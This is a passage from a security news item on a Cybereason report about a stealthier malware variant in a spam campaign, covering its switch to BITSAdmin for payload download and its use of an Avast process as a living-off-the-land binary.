The latest campaign, discovered by the Cybereason Nocturnus Research team, uses an evolved variant of the malware that goes to great lengths to remain stealthy in what is described as a ‘massive spam campaign’. In a blog report published today, Cybereason has noted four major differences from earlier variants.
Firstly, this variant exclusively uses BITSAdmin (as used in the latest-reported APT10 attacks) to download the payload. Earlier versions used Windows’ certificate management tool, certutil.
Secondly, in a major and effective move, the latest version uses rather than evades the Avast anti-malware product. Earlier versions simply stopped if Avast was present. The latest version uses an Avast process as a LOLBin.